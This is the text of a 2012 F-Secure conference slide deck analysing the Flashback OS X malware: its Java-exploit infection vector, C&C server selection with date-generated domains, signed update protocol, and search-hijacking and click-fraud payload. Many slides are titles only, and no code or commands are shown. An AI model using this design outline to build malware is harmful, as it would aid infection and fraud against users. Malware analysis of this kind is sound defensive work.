Flashback OS X Malware Broderick Ian Aquilino September 27, 2012 - - PowerPoint PPT Presentation

flashback os x malware
SMART_READER_LITE
LIVE PREVIEW

Flashback OS X Malware Broderick Ian Aquilino September 27, 2012 - - PowerPoint PPT Presentation

Feb 16, 2024 266 likes •620 views

Flashback OS X Malware Broderick Ian Aquilino September 27, 2012 Protecting the irreplaceable | f-secure.com Agenda Infection Vector Installation Main Binary C&C Servers Payload Remaining Binaries

slide-1
SLIDE 1

Protecting the irreplaceable | f-secure.com

Flashback OS X Malware

Broderick Ian Aquilino – September 27, 2012

slide-2
SLIDE 2

Agenda

  • Infection Vector
  • Installation
  • Main Binary
  • C&C Servers
  • Payload
  • Remaining Binaries
  • Filter/Loader Binary
  • LaunchAgent Binary

September 27, 2012 2

slide-3
SLIDE 3

Infection Summary

September 27, 2012 3

Hacked Website Distribution Website Installer Main Binary Filter / Loader Launch Agent

slide-4
SLIDE 4

Infection Vector

September 27, 2012 4

Hacked Website Distribution Website Installer Main Binary Filter / Loader Launch Agent

slide-5
SLIDE 5

Infection Vector

September 27, 2012 5

slide-6
SLIDE 6

Infection Vector

September 27, 2012 6

slide-7
SLIDE 7

Infection Vector

September 27, 2012 7

slide-8
SLIDE 8

Infection Vector

  • CVE-2008-5353
  • CVE-2011-3544
  • CVE-2012-0507

September 27, 2012 8

slide-9
SLIDE 9

Installation

September 27, 2012 9

Hacked Website Distribution Website Installer Main Binary Filter / Loader Launch Agent

slide-10
SLIDE 10

Main Binary

September 27, 2012 10

Hacked Website Distribution Website Installer Main Binary Filter / Loader Launch Agent

slide-11
SLIDE 11

Main Binary: Update Server

  • Creates a thread that connects to a set of C&C servers to

download updates every 3670 secs (>1hr)

September 27, 2012 11

Hardcoded list Returned by a third party server Generated list based on date (*new variants

  • nly)
slide-12
SLIDE 12

Main Binary: Update Program

  • Response:
  • %marker1%%encoded_VM_program%%marker2%

%encoded_MD5_RSA_signature%%marker3%

  • Log SHA1 of VM program
  • {HOME}/Library/Logs/swlog
  • {HOME}/Library/Logs/vmLog

September 27, 2012 12

slide-13
SLIDE 13

Main Binary: Payload C&C (Newer Variants)

  • Same thread will also connect to another set of C&C

servers

  • This time to select a server for executing the payload

September 27, 2012 13

Updateable list (Entry ID 3035856777) Hardcoded list (Entry ID 2522550406) Generated list based on date

slide-14
SLIDE 14

Main Binary: Payload C&C (Old Variants)

  • Selected only once - when binary is loaded

September 27, 2012 14

Hardcoded list (Entry ID 2413278617)

slide-15
SLIDE 15

Main Binary: Payload C&C Validation

  • Response
  • %SHA1_string_of_server_name% |

%MD5_RSA_signature%

  • Use (2nd – old variant / 1st – new variant) host in

hardcoded list as default server

  • Use “localhost” if configuration entry does not exists

(new variant only)

September 27, 2012 15

slide-16
SLIDE 16

Main Binary: Payload (Old Variants)

September 27, 2012 16

Outbound

CFWriteStreamWrite send

Inbound

CFReadStreamRead recv

slide-17
SLIDE 17

Main Binary: Payload (Old Variants)

September 27, 2012 17

Outbound

To Google? Pls reply in a format that is parseable

Inbound

Contains target string? Inject content

slide-18
SLIDE 18

Demo

September 27, 2012 18

slide-19
SLIDE 19

Main Binary: Payload (Newer Variants)

September 27, 2012 19

Browser CFWriteStreamWrite CFReadStreamRead Other Modules Command and Control Google Destination

slide-20
SLIDE 20

Main Binary: Payload (Newer) -> Search

September 27, 2012 20

Browser CFWriteStreamWrite CFReadStreamRead Other Modules Command and Control Google Destination Keyword and other info

slide-21
SLIDE 21

Main Binary: Payload (Newer) -> Search

September 27, 2012 21

Browser CFWriteStreamWrite CFReadStreamRead Other Modules Command and Control Google Destination Redirection data and/or

  • ther commands

Original search request Google search result

slide-22
SLIDE 22

Main Binary: Payload (Newer) -> Click

September 27, 2012 22

Browser CFWriteStreamWrite CFReadStreamRead Other Modules Command and Control Google Destination Tracking info Redirection info Redirection info

slide-23
SLIDE 23

Main Binary: Payload (Newer) -> Click

  • Google return the request in the response

September 27, 2012 23

slide-24
SLIDE 24

Main Binary: Payload (Newer) -> Click

September 27, 2012 24

Browser CFWriteStreamWrite CFReadStreamRead Other Modules Command and Control Google Destination Redirection script Request to new destination

slide-25
SLIDE 25

Main Binary: Payload (Newer) -> Click

September 27, 2012 25

Browser CFWriteStreamWrite CFReadStreamRead Other Modules Command and Control Google Destination Request with modified referrer

slide-26
SLIDE 26

Demo

September 27, 2012 26

slide-27
SLIDE 27

Filter/Loader Binary

September 27, 2012 27

Hacked Website Distribution Website Installer Main Binary Filter / Loader Launch Agent

slide-28
SLIDE 28

Filter/Loader Binary

September 27, 2012 28

slide-29
SLIDE 29

Filter/Loader Binary

September 27, 2012 29

slide-30
SLIDE 30

LaunchAgent Binary

September 27, 2012 30

Hacked Website Distribution Website Installer Main Binary Filter / Loader Launch Agent

slide-31
SLIDE 31

LaunchAgent Binary

  • Stand-alone light version of the updater module found in

the main binary

  • Uses different set of C&C servers
  • Similar server validation process
  • Logs CRC32 of the update/installation program
  • /tmp/.%crc32_of_VM_program%
  • Have it’s own instruction set

September 27, 2012 31

Generated list based on constants Generated list based on date Hardcoded list

slide-32
SLIDE 32

LaunchAgent Binary - Recent Variant

September 27, 2012 32

slide-33
SLIDE 33

LaunchAgent Binary - Recent Variant

  • Taken over the responsibility of installing the malware

September 27, 2012 33

slide-34
SLIDE 34

Thank you! Please check out the conference paper for more details.

broderick.aquilino@f-secure.com